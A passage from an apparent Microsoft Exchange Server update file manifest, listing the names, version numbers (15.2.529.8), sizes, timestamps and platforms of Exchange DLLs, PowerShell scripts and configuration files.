\nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts_exsmime.dll| 15.2.529.8| 380,792| 01-Jan-2020| 11:21| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.529.8| 1,686,400| 01-Jan-2020| 11:21| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:22| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.529.8| 12,872| 01-Jan-2020| 11:22| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:22| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:22| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:22| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:22| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:22| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.529.8| 12,872| 01-Jan-2020| 11:21| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nDagcommonlibrary.ps1| Not applicable| 60,222| 01-Jan-2020| 11:21| Not applicable \nDependentassemblygenerator.exe| 15.2.529.8| 22,400| 01-Jan-2020| 11:22| x86 \nDiaghelper.dll| 15.2.529.8| 67,152| 01-Jan-2020| 11:21| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 01-Jan-2020| 11:21| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,358| 01-Jan-2020| 11:21| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,181| 01-Jan-2020| 11:21| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,654| 01-Jan-2020| 11:21| Not applicable \nDisklockerapi.dll| Not applicable| 22,608| 01-Jan-2020| 11:20| x64 \nDlmigrationmodule.psm1| Not applicable| 39,576| 01-Jan-2020| 11:20| Not applicable \nDsaccessperf.dll| 15.2.529.8| 46,160| 01-Jan-2020| 11:19| x64 \nDscperf.dll| 15.2.529.8| 32,872| 01-Jan-2020| 11:19| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.529.8| 1,686,400| 01-Jan-2020| 11:21| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.529.8| 601,472| 01-Jan-2020| 11:19| x86 \nEcpperfcounters.xml| Not applicable| 30,344| 01-Jan-2020| 11:21| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:22| x86 \nEdgetransport.exe| 15.2.529.8| 49,528| 01-Jan-2020| 11:22| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 504| 01-Jan-2020| 09:07| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:22| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:22| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:22| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:21| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:21| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.529.8| 13,184| 01-Jan-2020| 11:22| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,664| 01-Jan-2020| 11:22| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.529.8| 12,880| 01-Jan-2020| 11:22| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,360| 01-Jan-2020| 11:21| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,559| 01-Jan-2020| 11:21| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,584| 01-Jan-2020| 11:21| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,598| 01-Jan-2020| 11:20| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,912| 01-Jan-2020| 11:20| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,647| 01-Jan-2020| 11:21| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.529.8| 17,792| 01-Jan-2020| 11:21| x86 \nEscprint.dll| 15.2.529.8| 20,344| 01-Jan-2020| 11:22| x64 \nEse.dll| 15.2.529.8| 3,741,568| 01-Jan-2020| 11:19| x64 \nEseback2.dll| 15.2.529.8| 350,080| 01-Jan-2020| 11:19| x64 \nEsebcli2.dll| 15.2.529.8| 318,536| 01-Jan-2020| 11:21| x64 \nEseperf.dll| 15.2.529.8| 108,920| 01-Jan-2020| 11:20| x64 \nEseutil.exe| 15.2.529.8| 425,336| 01-Jan-2020| 11:22| x64 \nEsevss.dll| 15.2.529.8| 44,416| 01-Jan-2020| 11:21| x64 \nEtweseproviderresources.dll| 15.2.529.8| 101,240| 01-Jan-2020| 11:22| x64 \nEventperf.dll| 15.2.529.8| 59,776| 01-Jan-2020| 11:21| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,417| 01-Jan-2020| 11:22| Not applicable \nExchange.format.ps1xml| Not applicable| 649,678| 01-Jan-2020| 11:22| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,647| 01-Jan-2020| 11:22| Not applicable \nExchange.ps1| Not applicable| 21,123| 01-Jan-2020| 11:22| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,531| 01-Jan-2020| 11:22| Not applicable \nExchange.types.ps1xml| Not applicable| 365,453| 01-Jan-2020| 11:22| Not applicable \nExchangeudfcommon.dll| 15.2.529.8| 122,744| 01-Jan-2020| 11:22| x86 \nExchangeudfs.dll| 15.2.529.8| 272,760| 01-Jan-2020| 11:22| x86 \nExchmem.dll| 15.2.529.8| 86,608| 01-Jan-2020| 11:21| x64 \nExchsetupmsg.dll| 15.2.529.8| 19,528| 01-Jan-2020| 11:22| x64 \nExdbfailureitemapi.dll| Not applicable| 27,008| 01-Jan-2020| 11:21| x64 \nExdbmsg.dll| 15.2.529.8| 230,784| 01-Jan-2020| 11:22| x64 \nExeventperfplugin.dll| 15.2.529.8| 25,472| 01-Jan-2020| 11:20| x64 \nExmime.dll| 15.2.529.8| 364,920| 01-Jan-2020| 11:22| x64 \nExportedgeconfig.ps1| Not applicable| 27,391| 01-Jan-2020| 11:20| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,558| 01-Jan-2020| 11:21| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,850| 01-Jan-2020| 11:20| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,374| 01-Jan-2020| 11:21| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,417| 01-Jan-2020| 11:21| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,340| 01-Jan-2020| 11:20| Not applicable \nExppw.dll| 15.2.529.8| 83,320| 01-Jan-2020| 11:21| x64 \nExprfdll.dll| 15.2.529.8| 26,704| 01-Jan-2020| 11:25| x64 \nExrpc32.dll| 15.2.529.8| 2,029,952| 01-Jan-2020| 11:21| x64 \nExrw.dll| 15.2.529.8| 28,232| 01-Jan-2020| 11:21| x64 \nExsetdata.dll| 15.2.529.8| 2,779,728| 01-Jan-2020| 11:22| x64 \nExsetup.exe| 15.2.529.8| 35,200| 01-Jan-2020| 11:22| x86 \nExsetupui.exe| 15.2.529.8| 471,936| 01-Jan-2020| 11:22| x86 \nExtrace.dll| 15.2.529.8| 245,112| 01-Jan-2020| 11:20| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.529.8| 601,472| 01-Jan-2020| 11:19| x86 \nExwatson.dll| 15.2.529.8| 44,928| 01-Jan-2020| 11:19| x64 \nFastioext.dll| 15.2.529.8| 60,288| 01-Jan-2020| 11:22| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 01-Jan-2020| 11:24| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,118| 01-Jan-2020| 11:25| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,793| 01-Jan-2020| 11:24| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 01-Jan-2020| 11:21| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 01-Jan-2020| 11:21| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,625| 01-Jan-2020| 11:25| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 01-Jan-2020| 11:25| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 01-Jan-2020| 11:25| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 01-Jan-2020| 11:20| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 01-Jan-2020| 11:25| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 01-Jan-2020| 11:25| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,787| 01-Jan-2020| 11:24| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 01-Jan-2020| 11:19| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 01-Jan-2020| 11:19| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 01-Jan-2020| 11:19| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,763| 01-Jan-2020| 11:24| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,793| 01-Jan-2020| 11:24| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 01-Jan-2020| 11:19| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 01-Jan-2020| 11:24| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 01-Jan-2020| 11:19| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 01-Jan-2020| 11:24| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,790| 01-Jan-2020| 11:24| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 01-Jan-2020| 11:24| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 01-Jan-2020| 11:20| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,793,037| 01-Jan-2020| 11:20| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,643| 01-Jan-2020| 11:24| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 01-Jan-2020| 11:24| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 01-Jan-2020| 11:19| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 01-Jan-2020| 11:25| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 01-Jan-2020| 11:20| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,535| 01-Jan-2020| 11:21| Not applicable \nFilteringpowershell.dll| 15.2.529.8| 223,096| 01-Jan-2020| 11:20| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 01-Jan-2020| 11:20| Not applicable \nFiltermodule.dll| 15.2.529.8| 180,088| 01-Jan-2020| 11:21| x64 \nFipexeuperfctrresource.dll| 15.2.529.8| 15,232| 01-Jan-2020| 11:21| x64 \nFipexeventsresource.dll| 15.2.529.8| 45,136| 01-Jan-2020| 11:21| x64 \nFipexperfctrresource.dll| 15.2.529.8| 32,848| 01-Jan-2020| 11:20| x64 \nFirewallres.dll| 15.2.529.8| 72,808| 01-Jan-2020| 11:21| x64 \nFms.exe| 15.2.529.8| 1,350,008| 01-Jan-2020| 11:20| x64 \nForefrontactivedirectoryconnector.exe| 15.2.529.8| 110,976| 01-Jan-2020| 11:22| x64 \nFpsdiag.exe| 15.2.529.8| 18,808| 01-Jan-2020| 11:21| x86 \nFsccachedfilemanagedlocal.dll| 15.2.529.8| 822,352| 01-Jan-2020| 11:21| x64 \nFscconfigsupport.dll| 15.2.529.8| 56,904| 01-Jan-2020| 11:21| x86 \nFscconfigurationserver.exe| 15.2.529.8| 430,976| 01-Jan-2020| 11:21| x64 \nFscconfigurationserverinterfaces.dll| 15.2.529.8| 15,952| 01-Jan-2020| 11:21| x86 \nFsccrypto.dll| 15.2.529.8| 208,760| 01-Jan-2020| 11:21| x64 \nFscipcinterfaceslocal.dll| 15.2.529.8| 28,752| 01-Jan-2020| 11:21| x86 \nFscipclocal.dll| 15.2.529.8| 38,264| 01-Jan-2020| 11:21| x86 \nFscsqmuploader.exe| 15.2.529.8| 453,712| 01-Jan-2020| 11:22| x64 \nGetucpool.ps1| Not applicable| 20,071| 01-Jan-2020| 11:20| Not applicable \nGetvalidengines.ps1| Not applicable| 13,270| 01-Jan-2020| 11:20| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 16,089| 01-Jan-2020| 11:21| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,635| 01-Jan-2020| 11:21| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,707| 01-Jan-2020| 11:21| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,755| 01-Jan-2020| 11:21| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,778| 01-Jan-2020| 11:21| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,985| 01-Jan-2020| 11:20| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,794| 01-Jan-2020| 11:20| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,668| 01-Jan-2020| 11:20| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 29,243| 01-Jan-2020| 11:21| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,022| 01-Jan-2020| 11:21| Not applicable \nGet_storetrace.ps1| Not applicable| 51,867| 01-Jan-2020| 11:20| Not applicable \nHuffman_xpress.dll| 15.2.529.8| 32,632| 01-Jan-2020| 11:21| x64 \nImportedgeconfig.ps1| Not applicable| 77,244| 01-Jan-2020| 11:21| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,776| 01-Jan-2020| 11:21| Not applicable \nImport_retentiontags.ps1| Not applicable| 29,114| 01-Jan-2020| 11:21| Not applicable \nInproxy.dll| 15.2.529.8| 85,880| 01-Jan-2020| 11:19| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 01-Jan-2020| 11:22| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,909| 01-Jan-2020| 11:21| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,959| 01-Jan-2020| 11:21| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.529.8| 107,384| 01-Jan-2020| 11:21| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.529.8| 20,344| 01-Jan-2020| 11:22| Not applicable \nInterop.certenroll.dll| 15.2.529.8| 142,928| 01-Jan-2020| 11:19| x86 \nInterop.licenseinfointerface.dll| 15.2.529.8| 14,208| 01-Jan-2020| 11:20| x86 \nInterop.netfw.dll| 15.2.529.8| 34,384| 01-Jan-2020| 11:20| x86 \nInterop.plalibrary.dll| 15.2.529.8| 72,776| 01-Jan-2020| 11:19| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.529.8| 27,000| 01-Jan-2020| 11:22| Not applicable \nInterop.taskscheduler.dll| 15.2.529.8| 46,672| 01-Jan-2020| 11:20| x86 \nInterop.wuapilib.dll| 15.2.529.8| 60,800| 01-Jan-2020| 11:22| x86 \nInterop.xenroll.dll| 15.2.529.8| 39,800| 01-Jan-2020| 11:20| x86 \nKerbauth.dll| 15.2.529.8| 63,056| 01-Jan-2020| 11:22| x64 \nLicenseinfointerface.dll| 15.2.529.8| 643,448| 01-Jan-2020| 11:21| x64 \nLpversioning.xml| Not applicable| 19,954| 01-Jan-2020| 11:21| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,900| 01-Jan-2020| 11:20| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.529.8| 138,624| 01-Jan-2020| 11:21| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,233| 01-Jan-2020| 11:20| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,336| 01-Jan-2020| 11:21| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,334| 01-Jan-2020| 11:21| Not applicable \nMce.dll| 15.2.529.8| 1,693,264| 01-Jan-2020| 11:21| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,483| 01-Jan-2020| 11:20| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,623| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.database.isam.dll| 15.2.529.8| 127,864| 01-Jan-2020| 11:22| x86 \nMicrosoft.dkm.proxy.dll| 15.2.529.8| 25,984| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.529.8| 68,472| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.529.8| 17,792| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.529.8| 233,344| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.529.8| 15,736| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.529.8| 43,384| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.529.8| 1,776,232| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.529.8| 505,416| 01-Jan-2020| 11:19| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.529.8| 76,152| 01-Jan-2020| 11:25| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.529.8| 135,552| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.529.8| 23,424| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.529.8| 15,736| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.529.8| 27,216| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.529.8| 53,632| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.assistants.dll| 15.2.529.8| 925,056| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.529.8| 26,192| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.529.8| 43,384| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.529.8| 15,224| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.529.8| 14,712| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.529.8| 70,520| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.529.8| 94,592| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.529.8| 13,176| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.529.8| 15,744| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.529.8| 36,944| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.529.8| 15,736| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.529.8| 79,736| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.529.8| 396,160| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.529.8| 21,368| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.529.8| 57,424| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.529.8| 14,712| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.529.8| 35,704| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.529.8| 276,352| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.529.8| 16,456| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.529.8| 25,976| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.529.8| 13,688| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.529.8| 23,416| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.529.8| 376,704| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.529.8| 83,840| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.529.8| 2,971,008| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.529.8| 5,029,752| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.529.8| 893,816| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.529.8| 413,776| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.529.8| 924,544| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.529.8| 31,824| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.529.8| 52,296| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.529.8| 21,888| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.529.8| 33,656| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.529.8| 3,515,264| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.529.8| 108,616| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.529.8| 288,632| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.529.8| 625,744| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.529.8| 86,400| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.529.8| 1,831,504| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.529.8| 31,608| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.529.8| 465,792| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.529.8| 25,464| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.529.8| 38,272| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.529.8| 102,776| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.529.8| 48,504| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.529.8| 67,448| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.common.dll| 15.2.529.8| 172,920| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.529.8| 113,528| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.il.dll| 15.2.529.8| 13,904| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.529.8| 130,424| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.529.8| 63,864| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.529.8| 19,832| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.529.8| 15,440| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.common.search.dll| 15.2.529.8| 108,920| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.529.8| 17,792| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.529.8| 51,576| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.529.8| 36,728| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.529.8| 27,512| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.529.8| 1,042,512| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.529.8| 29,264| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.529.8| 13,176| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.529.8| 181,328| 01-Jan-2020| 